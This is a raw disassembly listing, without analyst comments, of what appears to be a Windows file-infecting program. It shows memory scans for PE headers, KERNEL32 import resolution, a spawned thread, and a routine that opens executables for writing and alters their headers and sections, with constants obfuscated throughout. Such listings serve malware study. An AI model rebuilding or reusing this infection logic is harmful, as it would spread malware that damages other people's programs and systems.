jnb short loc_4427DC
movsx eax, word_44C150
sub eax, 7
push eax
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call sub_43A4B5
add esp, 0Ch
movsx edi, word_44C208
mov edx, dword_44C13C
lea edi, [edi+edx+0FFF7h]
cmp eax, edi
jnz short loc_4427DC
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call ds:dword_446020
push offset byte_44C883
call sub_43E507
push eax
push [ebp+arg_0]
call ds:dword_446020
add esp, 14h
loc_4427DC: ; CODE XREF: sub_442511+26D�j
; sub_442511+2A2�j
lea ecx, [ebp+ebx+var_FFF]
or eax, 0FFFFFFFFh
loc_4427E6: ; CODE XREF: sub_442511+2DA�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4427E6
add ebx, eax
add ebx, 1
inc [ebp+var_1004]
movsx eax, [ebp+ebx+var_FFF]
mov edx, dword_44C26C
add edx, dword_44C090
sub edx, 0Ch
cmp eax, edx
jnz loc_442632
push offset word_44C87E
call sub_43E507
push eax
push [ebp+arg_0]
call ds:dword_446020
add esp, 0Ch
mov eax, [ebp+var_1008]
mov dword_44C350, eax
loc_442839: ; CODE XREF: sub_442511+99�j
; sub_442511+CD�j
pop edi
pop esi
pop ebx
leave
retn
sub_442511 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44283E proc near ; CODE XREF: start+1�p
var_138 = dword ptr -138h
var_133 = byte ptr -133h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_127 = byte ptr -127h
var_124 = byte ptr -124h
var_122 = byte ptr -122h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_19 = byte ptr -19h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 138h
push ebx
push esi
push edi
lea eax, sub_440C0A
mov [ebp+var_10], eax
mov edx, eax
movsx ecx, word_44C160
add ecx, 0Fh
mov eax, edx
shr eax, cl
movsx edx, word_44C124
add edx, 0Ah
mov ecx, edx
mov ebx, eax
shl ebx, cl
loc_442873: ; CODE XREF: sub_44283E+4D�j
; sub_44283E+7D�j ...
mov [ebp+var_18], ebx
mov eax, ebx
cmp word ptr [eax], 5A4Dh
jz short loc_44288D
mov eax, dword_44C188
add eax, 10000h
sub ebx, eax
jmp short loc_442873
; ---------------------------------------------------------------------------
loc_44288D: ; CODE XREF: sub_44283E+3F�j
mov eax, dword_44C15C
add eax, 2Dh
add eax, dword_44C288
mov esi, ebx
add esi, eax
mov eax, ebx
add eax, [esi]
mov [ebp+var_14], eax
mov ecx, [ebp+var_10]
cmp eax, ecx
jbe short loc_4428BD
movsx eax, word_44C0E8
add eax, 0FFFFh
sub ebx, eax
jmp short loc_442873
; ---------------------------------------------------------------------------
loc_4428BD: ; CODE XREF: sub_44283E+6D�j
mov eax, [ebp+var_14]
mov [ebp+var_8], eax
movzx eax, word ptr [eax]
cmp eax, 4550h
jz short loc_4428DD
movsx eax, word_44C218
add eax, 0FFFBh
sub ebx, eax
jmp short loc_442873
; ---------------------------------------------------------------------------
loc_4428DD: ; CODE XREF: sub_44283E+8D�j
mov eax, [ebp+var_8]
mov eax, [eax+80h]
mov [ebp+var_C], eax
movsx eax, word_44C174
sub eax, 7
mov [ebp+var_4], eax
jmp loc_442A7A
; ---------------------------------------------------------------------------
loc_4428FB: ; CODE XREF: sub_44283E+248�j
mov eax, ebx
add eax, [ebp+var_C]
add eax, [ebp+var_4]
mov [ebp+var_12C], eax
mov edx, dword_44C12C
movsx ecx, word_44C180
add edx, ecx
sub edx, 0Ch
cmp [eax], edx
jz loc_442A8C
mov eax, [ebp+var_12C]
mov edx, ebx
add edx, [eax+0Ch]
mov [ebp+var_130], edx
push edx
lea eax, [ebp+var_127]
push eax
call sub_444F8C
mov eax, dword_44C1AC
add eax, dword_44C164
sub eax, 9
mov [ebp+var_28], eax
jmp short loc_442976
; ---------------------------------------------------------------------------
loc_442954: ; CODE XREF: sub_44283E+157�j
mov eax, [ebp+var_28]
mov al, [ebp+eax+var_127]
cmp al, 61h
jle short loc_442973
cmp al, 7Ah
jge short loc_442973
mov eax, [ebp+var_28]
lea eax, [ebp+eax+var_127]
sub byte ptr [eax], 20h
loc_442973: ; CODE XREF: sub_44283E+122�j
; sub_44283E+126�j
inc [ebp+var_28]
loc_442976: ; CODE XREF: sub_44283E+114�j
mov eax, [ebp+var_28]
movsx eax, [ebp+eax+var_127]
mov edx, dword_44C164
movsx ecx, word_44C1B4
add edx, ecx
sub edx, 8
cmp eax, edx
jnz short loc_442954
mov eax, dword_44C120
movsx edx, word_44C0CC
add eax, edx
cmp [ebp+eax+var_133], 4Bh
jnz loc_442A76
mov eax, dword_44C09C
cmp byte ptr [ebp+eax+var_12C+1], 45h
jnz loc_442A76
mov eax, dword_44C0EC
cmp byte ptr [ebp+eax+var_12C+3], 52h
jnz loc_442A76
mov eax, dword_44C138
cmp [ebp+eax+var_122], 4Ch
jnz loc_442A76
mov eax, dword_44C1F8
cmp [ebp+eax+var_124], 33h
jnz short loc_442A76
mov eax, dword_44C210
add eax, 4
add eax, dword_44C1A8
cmp [ebp+eax+var_127], 32h
jnz short loc_442A76
mov eax, [ebp+var_12C]
mov edx, ebx
add edx, [eax+10h]
mov [ebp+var_138], edx
mov eax, dword_44C204
dec eax
mov [ebp-134h], eax
loc_442A30: ; CODE XREF: sub_44283E+234�j
mov eax, [ebp+var_138]
mov esi, eax
add esi, [ebp-134h]
mov edi, [esi]
mov eax, dword_44C198
sub eax, 2
cmp edi, eax
jz short loc_442A8C
push edi
call sub_43C5C3
pop ecx
cmp dword_44C294, 0
jnz short loc_442A8C
movsx eax, word_44C130
add eax, dword_44C110
sub eax, 4
add [ebp-134h], eax
jmp short loc_442A30
; ---------------------------------------------------------------------------
jmp short loc_442A8C
; ---------------------------------------------------------------------------
loc_442A76: ; CODE XREF: sub_44283E+16F�j
; sub_44283E+182�j ...
add [ebp+var_4], 14h
loc_442A7A: ; CODE XREF: sub_44283E+B8�j
mov eax, [ebp+var_8]
mov eax, [eax+84h]
cmp [ebp+var_4], eax
jb loc_4428FB
loc_442A8C: ; CODE XREF: sub_44283E+DF�j
; sub_44283E+20C�j ...
cmp dword_44C294, 0
jz short loc_442AED
call sub_43C105
call sub_440F62
call sub_43B6F6
mov edx, eax
mov [ebp+var_19], dl
movzx eax, [ebp+var_19]
mov edx, dword_44C140
add edx, dword_44C204
sub edx, 8
cmp eax, edx
jz short loc_442AED
lea eax, [ebp+var_24]
push eax
mov eax, dword_44C1BC
add eax, dword_44C0AC
sub eax, 0Ah
push eax
lea eax, [ebp+var_20]
push eax
push offset sub_440C0A
mov eax, dword_44C110
sub eax, 5
push eax
push 0
call ds:dword_44BB90 ; CreateThread
loc_442AED: ; CODE XREF: sub_44283E+255�j
; sub_44283E+280�j
pop edi
pop esi
pop ebx
leave
retn
sub_44283E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_442AF2 proc near ; CODE XREF: sub_43F058+CD�p
; sub_43F058+122�p
var_7 = byte ptr -7
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov byte ptr [ebx], 0
mov ecx, esi
or eax, 0FFFFFFFFh
loc_442B08: ; CODE XREF: sub_442AF2+1B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_442B08
mov [ebp+var_4], eax
mov edi, dword_44C1D4
sub edi, 2
jmp short loc_442B8D
; ---------------------------------------------------------------------------
loc_442B1D: ; CODE XREF: sub_442AF2+9E�j
movzx eax, [ebp+arg_8]
cmp edi, eax
jb short loc_442B30
mov al, [esi+edi]
cmp al, 2Fh
jz short loc_442B30
cmp al, 2Eh
jnz short loc_442B4F
loc_442B30: ; CODE XREF: sub_442AF2+31�j
; sub_442AF2+38�j
push offset dword_44C878
call sub_43E507
movzx edx, byte ptr [esi+edi]
push edx
push eax
lea edx, [ebp+var_7]
push edx
call ds:dword_44B634
add esp, 10h
jmp short loc_442B7E
; ---------------------------------------------------------------------------
loc_442B4F: ; CODE XREF: sub_442AF2+3C�j
push offset byte_44C873
call sub_43E507
push eax
push ebx
call ds:dword_446020
push offset byte_44C86B
call sub_43E507
movzx edx, byte ptr [esi+edi]
push edx
push eax
lea edx, [ebp+var_7]
push edx
call ds:dword_44B634
add esp, 1Ch
loc_442B7E: ; CODE XREF: sub_442AF2+5B�j
lea eax, [ebp+var_7]
push eax
push ebx
call ds:dword_446020
add esp, 8
inc edi
loc_442B8D: ; CODE XREF: sub_442AF2+29�j
cmp edi, [ebp+var_4]
jb short loc_442B1D
pop edi
pop esi
pop ebx
leave
retn
sub_442AF2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_442B97 proc near ; CODE XREF: sub_43BB7B+188�p
var_170 = byte ptr -170h
var_16C = dword ptr -16Ch
var_168 = byte ptr -168h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 170h
push ebx
push esi
push edi
push 104h
lea eax, [ebp+var_104]
push eax
call ds:dword_448600 ; GetSystemDirectoryA
lea eax, [ebp+var_168]
push eax
call sub_44185A
push offset word_44C866
call sub_43E507
push eax
lea esi, [ebp+var_104]
push esi
call ds:dword_446020
lea eax, [ebp+var_168]
push eax
lea eax, [ebp+var_104]
push eax
call ds:dword_446020
push offset word_44C85E
call sub_43E507
push eax
lea esi, [ebp+var_104]
push esi
call ds:dword_446020
add esp, 24h
push 0
mov eax, dword_44C0F0
add eax, dword_44C158
sub eax, 0Ah
push eax
push 3
push 0
mov eax, dword_44C1E8
add eax, dword_44C0D4
sub eax, 7
push eax
push 80000000h
lea eax, [ebp+var_104]
push eax
call ds:dword_44B788 ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_442C5E
mov eax, dword_44C268
sub eax, 4
mov edx, [ebp+arg_0]
mov ecx, dword_44C288
sub ecx, 6
mov [edx+eax], cl
jmp short loc_442CCB
; ---------------------------------------------------------------------------
loc_442C5E: ; CODE XREF: sub_442B97+AC�j
push 0
push 0
push [ebp+arg_4]
push edi
call ds:dword_44BB9C ; SetFilePointer
push 0
lea eax, [ebp+var_170]
push eax
mov eax, dword_44C194
add eax, 0Bh
push eax
push [ebp+arg_0]
push edi
call ds:dword_446028 ; ReadFile
mov [ebp+var_16C], eax
push edi
call ds:dword_44A654 ; CloseHandle
mov eax, dword_44C0F8
add eax, dword_44C234
sub eax, 0Bh
cmp [ebp+var_16C], eax
jnz short loc_442CCB
mov eax, dword_44C1A8
sub eax, 2
mov edx, [ebp+arg_0]
mov ecx, dword_44C09C
movsx ebx, word_44C0BC
add ecx, ebx
sub ecx, 0Eh
mov [edx+eax], cl
loc_442CCB: ; CODE XREF: sub_442B97+C5�j
; sub_442B97+112�j
pop edi
pop esi
pop ebx
leave
retn
sub_442B97 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_442CD0 proc near ; DATA XREF: .data:off_44C354�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_8]
push offset dword_44DAC8
push esi
call ds:dword_44B648
or eax, eax
jz short loc_442CFC
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_442D44
; ---------------------------------------------------------------------------
loc_442CFC: ; CODE XREF: sub_442CD0+1A�j
push offset dword_44DA48
push esi
call ds:dword_44B648
or eax, eax
jz short loc_442D1C
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_442D44
; ---------------------------------------------------------------------------
loc_442D1C: ; CODE XREF: sub_442CD0+3A�j
push offset dword_44DA28
push esi
call ds:dword_44B648
or eax, eax
jz short loc_442D3C
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_442D44
; ---------------------------------------------------------------------------
loc_442D3C: ; CODE XREF: sub_442CD0+5A�j
and dword ptr [edi], 0
mov eax, 80004002h
loc_442D44: ; CODE XREF: sub_442CD0+2A�j
; sub_442CD0+4A�j ...
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_442CD0 endp
; =============== S U B R O U T I N E =======================================
sub_442D4B proc near ; CODE XREF: sub_440C0A+20�p
push edi
push offset byte_44C853
call sub_43E507
pop ecx
push eax
call ds:dword_4485E8 ; GetModuleHandleA
mov dword_44C2AC, eax
test eax, eax
jnz short loc_442D7E
push offset dword_44C848
call sub_43E507
pop ecx
push eax
call ds:dword_449244 ; LoadLibraryA
mov dword_44C2AC, eax
loc_442D7E: ; CODE XREF: sub_442D4B+1A�j
cmp dword_44C2AC, 0
jz short loc_442DA4
push offset word_44C832
call sub_43E507
pop ecx
push eax
push dword_44C2AC
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_448604, eax
loc_442DA4: ; CODE XREF: sub_442D4B+3A�j
pop edi
retn
sub_442D4B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_442DA6 proc near ; CODE XREF: sub_43CF47+11B�p
; DATA XREF: sub_43BB7B+CC�o
var_270 = byte ptr -270h
var_26C = dword ptr -26Ch
var_267 = byte ptr -267h
var_203 = byte ptr -203h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 270h
push esi
push edi
push 104h
lea eax, [ebp+var_104]
push eax
call ds:dword_448600 ; GetSystemDirectoryA
lea eax, [ebp+var_267]
push eax
call sub_44185A
push offset byte_44C82D
call sub_43E507
push eax
lea esi, [ebp+var_104]
push esi
call ds:dword_446020
lea eax, [ebp+var_267]
push eax
lea eax, [ebp+var_104]
push eax
call ds:dword_446020
push offset byte_44C825
call sub_43E507
push eax
lea esi, [ebp+var_104]
push esi
call ds:dword_446020
add esp, 24h
push 0
mov eax, dword_44C154
add eax, dword_44C1F8
sub eax, 0Ah
push eax
push 3
push 0
mov eax, dword_44C1E8
dec eax
push eax
push 80000000h
lea eax, [ebp+var_104]
push eax
call ds:dword_44B788 ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_442E52
mov eax, 2Ah
jmp short loc_442EBD
; ---------------------------------------------------------------------------
loc_442E52: ; CODE XREF: sub_442DA6+A3�j
push 0
lea eax, [ebp+var_270]
push eax
push 0FFh
lea eax, [ebp+var_203]
push eax
push edi
call ds:dword_446028 ; ReadFile
mov [ebp+var_26C], eax
push edi
call ds:dword_44A654 ; CloseHandle
mov eax, dword_44C1A0
sub eax, 3
cmp [ebp+var_26C], eax
jnz short loc_442E92
mov eax, 2Ah
jmp short loc_442EBD
; ---------------------------------------------------------------------------
loc_442E92: ; CODE XREF: sub_442DA6+E3�j
movzx eax, [ebp+var_203]
movsx edx, word_44C098
movsx ecx, word_44C174
lea edx, [edx+ecx+18h]
cmp eax, edx
jge short loc_442EB6
mov eax, 2Ah
jmp short loc_442EBD
; ---------------------------------------------------------------------------
loc_442EB6: ; CODE XREF: sub_442DA6+107�j
movzx eax, [ebp+var_203]
loc_442EBD: ; CODE XREF: sub_442DA6+AA�j
; sub_442DA6+EA�j ...
pop edi
pop esi
leave
retn
sub_442DA6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_442EC1 proc near ; DATA XREF: .data:0044C37C�o
push ebp
mov ebp, esp
mov eax, dword_44C0F4
sub eax, 7
cmp ds:dword_44BBA8, eax
jbe short loc_442EDF
push offset dword_44BBA8
call ds:dword_446010 ; InterlockedDecrement
loc_442EDF: ; CODE XREF: sub_442EC1+11�j
mov eax, ds:dword_44BBA8
pop ebp
retn 4
sub_442EC1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_442EE8 proc near ; DATA XREF: .data:0044C38C�o
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_4]
mov eax, [ebp+arg_10]
mov word ptr [ebp+arg_10], ax
movsx eax, word_44C24C
mov edx, dword_44C0B4
lea eax, [eax+edx+0E9h]
cmp edi, eax
jnz short loc_442F1B
push [ebp+arg_14]
call sub_43A58C
pop ecx
xor eax, eax
jmp short loc_442F41
; ---------------------------------------------------------------------------
loc_442F1B: ; CODE XREF: sub_442EE8+24�j
mov eax, dword_44C0B4
add eax, 0F5h
add eax, dword_44C14C
cmp edi, eax
jnz short loc_442F3C
push [ebp+arg_14]
call sub_43C974
pop ecx
xor eax, eax
jmp short loc_442F41
; ---------------------------------------------------------------------------
loc_442F3C: ; CODE XREF: sub_442EE8+45�j
mov eax, 80020003h
loc_442F41: ; CODE XREF: sub_442EE8+31�j
; sub_442EE8+52�j
pop edi
pop ebp
retn 24h
sub_442EE8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_442F46 proc near ; CODE XREF: sub_44229C+1D0�p
var_32014 = byte ptr -32014h
var_32011 = byte ptr -32011h
var_32010 = dword ptr -32010h
var_3200C = dword ptr -3200Ch
var_32007 = byte ptr -32007h
var_32006 = byte ptr -32006h
var_31F58 = dword ptr -31F58h
var_31F54 = dword ptr -31F54h
var_31F50 = dword ptr -31F50h
var_31F4C = dword ptr -31F4Ch
var_31F48 = dword ptr -31F48h
var_31F44 = dword ptr -31F44h
var_31F40 = dword ptr -31F40h
var_31F3C = dword ptr -31F3Ch
var_31F38 = dword ptr -31F38h
var_31F34 = dword ptr -31F34h
var_31F30 = dword ptr -31F30h
var_31F2C = dword ptr -31F2Ch
var_31F28 = dword ptr -31F28h
var_31F24 = dword ptr -31F24h
var_31F20 = dword ptr -31F20h
var_31F1C = dword ptr -31F1Ch
var_31F18 = dword ptr -31F18h
var_31F14 = dword ptr -31F14h
var_31F10 = dword ptr -31F10h
var_31F0C = dword ptr -31F0Ch
var_31F08 = dword ptr -31F08h
var_31F04 = dword ptr -31F04h
var_31F00 = dword ptr -31F00h
var_31EFC = dword ptr -31EFCh
var_31EF8 = dword ptr -31EF8h
var_31EF4 = dword ptr -31EF4h
var_31EF0 = dword ptr -31EF0h
var_31EEC = dword ptr -31EECh
var_31EE8 = dword ptr -31EE8h
var_31EE4 = dword ptr -31EE4h
var_31EE0 = dword ptr -31EE0h
var_31EDC = dword ptr -31EDCh
var_31ED8 = dword ptr -31ED8h
var_31ED4 = byte ptr -31ED4h
var_31EC7 = byte ptr -31EC7h
var_1194 = dword ptr -1194h
var_1190 = dword ptr -1190h
var_118C = dword ptr -118Ch
var_1188 = dword ptr -1188h
var_1184 = dword ptr -1184h
var_1180 = dword ptr -1180h
var_117C = dword ptr -117Ch
var_1178 = dword ptr -1178h
var_1174 = dword ptr -1174h
var_116F = byte ptr -116Fh
var_1070 = dword ptr -1070h
var_106C = dword ptr -106Ch
var_1068 = dword ptr -1068h
var_1064 = dword ptr -1064h
var_1060 = dword ptr -1060h
var_105C = dword ptr -105Ch
var_1058 = dword ptr -1058h
var_1054 = dword ptr -1054h
var_1050 = dword ptr -1050h
var_C54 = dword ptr -0C54h
var_C50 = dword ptr -0C50h
var_C4C = dword ptr -0C4Ch
var_850 = dword ptr -850h
var_84C = dword ptr -84Ch
var_848 = dword ptr -848h
var_844 = dword ptr -844h
var_840 = dword ptr -840h
var_83C = dword ptr -83Ch
var_440 = dword ptr -440h
var_43C = dword ptr -43Ch
var_438 = dword ptr -438h
var_434 = dword ptr -434h
var_430 = dword ptr -430h
var_42C = dword ptr -42Ch
var_428 = dword ptr -428h
var_424 = dword ptr -424h
var_420 = dword ptr -420h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 32010h
call sub_444F6C
push ebx
push esi
push edi
push [ebp+arg_8]
push [ebp+arg_4]
lea eax, [ebp+var_31EC7]
push eax
call ds:dword_44A638
add esp, 0Ch
push 0
mov eax, dword_44C09C
sub eax, 5
push eax
push 3
push 0
mov eax, dword_44C234
add eax, dword_44C284
sub eax, 0Dh
push eax
push 0C0000001h
push [ebp+arg_0]
call ds:dword_44B788 ; CreateFileA
mov [ebp+var_1070], eax
cmp eax, 0FFFFFFFFh
jnz short loc_442FAA
xor eax, eax
jmp loc_444439
; ---------------------------------------------------------------------------
loc_442FAA: ; CODE XREF: sub_442F46+5B�j
push 0
push [ebp+var_1070]
call ds:dword_44B624 ; GetFileSize
mov [ebp+var_10], eax
mov edx, [ebp+arg_8]
lea eax, [eax+edx+1FFFFh]
push eax
push 0
call ds:dword_448A34 ; LocalAlloc
mov [ebp+var_4], eax
push 0
lea eax, [ebp+var_31EDC]
push eax
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_1070]
call ds:dword_446028 ; ReadFile
mov eax, [ebp+var_4]
mov eax, [eax+3Ch]
mov [ebp+var_840], eax
mov eax, [ebp+var_31EDC]
sub eax, 0F8h
cmp [ebp+var_840], eax
ja loc_444422
mov eax, [ebp+var_840]
add eax, [ebp+var_4]
mov [ebp+var_8], eax
movzx eax, word ptr [eax]
cmp eax, 4550h
jnz loc_444422
mov eax, [ebp+var_8]
movzx eax, word ptr [eax+5Ch]
movsx edx, word_44C0CC
sub edx, 6
cmp eax, edx
jz loc_444422
and [ebp+var_1180], 0
mov eax, [ebp+var_8]
movzx edx, word ptr [eax+44h]
mov ecx, dword_44C238
add ecx, 7
add ecx, dword_44C0D4
cmp edx, ecx
jnz short loc_4430A5
mov edx, dword_44C0C4
inc edx
mov [eax+1Ah], dl
cmp dl, 0
jz short loc_4430A5
movzx eax, word ptr [eax+46h]
mov [ebp+var_31EEC], eax
movsx eax, word_44C22C
movsx edx, word_44C0FC
add eax, edx
sub eax, 0Bh
cmp [ebp+var_31EEC], eax
jnb loc_444422
mov [ebp+var_1180], 1
loc_4430A5: ; CODE XREF: sub_442F46+11B�j
; sub_442F46+12A�j
cmp [ebp+var_1180], 0
jz short loc_4430C6
mov eax, [ebp+var_8]
add eax, 6
movzx edx, word ptr [eax]
movsx ecx, word_44C0C0
add ecx, 2
sub edx, ecx
mov [eax], dx
loc_4430C6: ; CODE XREF: sub_442F46+166�j
mov eax, [ebp+var_8]
mov eax, [eax+80h]
mov [ebp+var_430], eax
mov eax, 28h
mov [ebp+var_31EEC], eax
mov edx, [ebp+var_8]
mov [ebp+var_31EF4], edx
mov ecx, [ebp+var_840]
add ecx, 0F8h
mov [ebp+var_31EF0], eax
movzx edi, word ptr [edx+6]
mul edi
mov [ebp+var_31EF8], eax
mov edx, ecx
add edx, eax
mov [ebp+var_31F00], edx
mov eax, [ebp+var_31EEC]
mov [ebp+var_31EFC], eax
mov ecx, dword_44C0B8
movsx edi, word_44C240
add ecx, edi
dec ecx
mul ecx
mov [ebp+var_31F04], eax
mov eax, [ebp+var_31F00]
mov edx, [ebp+var_31F04]
add eax, edx
mov edx, [ebp+var_31EF4]
add eax, [edx+0D4h]
cmp eax, [edx+54h]
ja loc_444422
mov eax, dword_44C128
movsx edx, word_44C1E0
add eax, edx
sub eax, 0Ch
mov [ebp+var_20], eax
movsx eax, word_44C260
add eax, dword_44C1B0
sub eax, 9
mov [ebp+var_C54], eax
mov eax, dword_44C238
mov [ebp+var_105C], eax
mov eax, dword_44C1D8
movsx edx, word_44C208
add eax, edx
sub eax, 0Eh
mov [ebp+var_434], eax
jmp loc_44326B
; ---------------------------------------------------------------------------
loc_4431A9: ; CODE XREF: sub_442F46+332�j
mov eax, 28h
mul [ebp+var_434]
mov [ebp+var_31F10], eax
mov eax, [ebp+var_840]
mov edx, [ebp+var_4]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F10]
mov esi, edx
add esi, eax
mov eax, [esi+0Ch]
add eax, [esi+8]
mov [ebp+var_31F08], eax
mov eax, [esi+14h]
add eax, [esi+10h]
mov [ebp+var_31F0C], eax
mov eax, [ebp+var_20]
cmp [ebp+var_31F08], eax
jbe short loc_443200
mov eax, [ebp+var_31F08]
mov [ebp+var_20], eax
loc_443200: ; CODE XREF: sub_442F46+2AF�j
mov eax, [ebp+var_C54]
cmp [ebp+var_31F0C], eax
jbe short loc_44321A
mov eax, [ebp+var_31F0C]
mov [ebp+var_C54], eax
loc_44321A: ; CODE XREF: sub_442F46+2C6�j
mov eax, [ebp+var_8]
mov eax, [eax+0A8h]
cmp eax, [esi+0Ch]
jb short loc_443245
cmp eax, [ebp+var_31F08]
jnb short loc_443245
mov eax, [esi+14h]
mov edx, [ebp+var_8]
add eax, [edx+0A8h]
sub eax, [esi+0Ch]
mov [ebp+var_105C], eax
loc_443245: ; CODE XREF: sub_442F46+2E0�j
; sub_442F46+2E8�j
mov eax, [ebp+var_430]
mov edx, [esi+0Ch]
cmp eax, edx
jb short loc_443265
add edx, [esi+8]
cmp eax, edx
jnb short loc_443265
sub eax, [esi+0Ch]
add eax, [esi+14h]
mov [ebp+var_844], eax
loc_443265: ; CODE XREF: sub_442F46+30A�j
; sub_442F46+311�j
inc [ebp+var_434]
loc_44326B: ; CODE XREF: sub_442F46+25E�j
mov eax, [ebp+var_8]
movzx eax, word ptr [eax+6]
cmp [ebp+var_434], eax
jb loc_4431A9
mov eax, dword_44C18C
add eax, 1000h
push eax
push [ebp+var_20]
call sub_43EC87
add esp, 8
mov [ebp+var_20], eax
cmp [ebp+var_1180], 0
jz short loc_4432A9
mov eax, [ebp+var_C54]
mov [ebp+var_10], eax
loc_4432A9: ; CODE XREF: sub_442F46+358�j
mov eax, [ebp+var_C54]
cmp [ebp+var_10], eax
jz short loc_4432CC
mov eax, [ebp+var_8]
mov edx, dword_44C0C4
sub edx, 7
cmp [eax+0A8h], edx
jz loc_444422
loc_4432CC: ; CODE XREF: sub_442F46+36C�j
mov eax, dword_44C0F8
sub eax, 7
cmp [ebp+var_105C], eax
jz loc_4433AB
mov eax, dword_44C280
add eax, dword_44C14C
sub eax, 0Ah
mov [ebp+var_31F10], eax
mov eax, dword_44C194
sub eax, 9
mov [ebp+var_31F08], eax
jmp short loc_443352
; ---------------------------------------------------------------------------
loc_443304: ; CODE XREF: sub_442F46+432�j
mov eax, [ebp+var_105C]
mov [ebp+var_31F14], eax
mov eax, 1Ch
mul [ebp+var_31F08]
mov [ebp+var_31F18], eax
mov eax, [ebp+var_31F14]
mov edx, [ebp+var_31F18]
add eax, edx
add eax, [ebp+var_4]
mov [ebp+var_31F0C], eax
mov edx, [ebp+var_31F10]
cmp [eax+18h], edx
jbe short loc_44334C
mov eax, [eax+18h]
mov [ebp+var_31F10], eax
loc_44334C: ; CODE XREF: sub_442F46+3FB�j
inc [ebp+var_31F08]
loc_443352: ; CODE XREF: sub_442F46+3BC�j
mov edi, [ebp+var_8]
mov eax, [edi+0ACh]
mov ecx, 1Ch
shr eax, 2
mov edx, 24924925h
mul edx
mov [ebp+var_31F14], edx
mov edi, edx
cmp [ebp+var_31F08], edi
jb short loc_443304
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
push [ebp+var_31F10]
call sub_43EC87
add esp, 8
mov [ebp+var_31F10], eax
mov eax, [ebp+var_C54]
cmp eax, [ebp+var_10]
jz short loc_4433AB
cmp [ebp+var_31F10], eax
jnz loc_444422
loc_4433AB: ; CODE XREF: sub_442F46+394�j
; sub_442F46+457�j
and [ebp+var_1174], 0
mov eax, dword_44C188
mov [ebp+var_438], eax
jmp loc_443505
; ---------------------------------------------------------------------------
loc_4433C2: ; CODE XREF: sub_442F46+5CE�j
mov eax, [ebp+var_844]
add eax, [ebp+var_438]
add eax, [ebp+var_4]
mov [ebp+var_3200C], eax
mov edx, dword_44C0EC
sub edx, 4
cmp [eax], edx
jz loc_44351A
mov eax, [ebp+var_3200C]
mov eax, [eax+0Ch]
sub eax, [ebp+var_430]
add eax, [ebp+var_844]
mov [ebp+var_32010], eax
add eax, [ebp+var_4]
push eax
lea eax, [ebp+var_32007]
push eax
call ds:dword_4481F4
add esp, 8
mov eax, dword_44C0C8
mov [ebp+var_31F08], eax
jmp short loc_44344F
; ---------------------------------------------------------------------------
loc_443424: ; CODE XREF: sub_442F46+52C�j
mov eax, [ebp+var_31F08]
mov al, [ebp+eax+var_32007]
cmp al, 61h
jle short loc_443449
cmp al, 7Ah
jge short loc_443449
mov eax, [ebp+var_31F08]
lea eax, [ebp+eax+var_32007]
sub byte ptr [eax], 20h
loc_443449: ; CODE XREF: sub_442F46+4ED�j
; sub_442F46+4F1�j
inc [ebp+var_31F08]
loc_44344F: ; CODE XREF: sub_442F46+4DC�j
mov eax, [ebp+var_31F08]
movsx eax, [ebp+eax+var_32007]
movsx edx, word_44C104
movsx ecx, word_44C0A4
add edx, ecx
sub edx, 0Eh
cmp eax, edx
jnz short loc_443424
movsx eax, word_44C0FC
movsx edx, word_44C0B0
add eax, edx
cmp [ebp+eax+var_32014], 4Bh
jnz short loc_4434FE
movsx eax, word_44C160
movsx edx, word_44C27C
add eax, edx
cmp byte ptr [ebp+eax+var_3200C+1], 45h
jnz short loc_4434FE
mov eax, dword_44C204
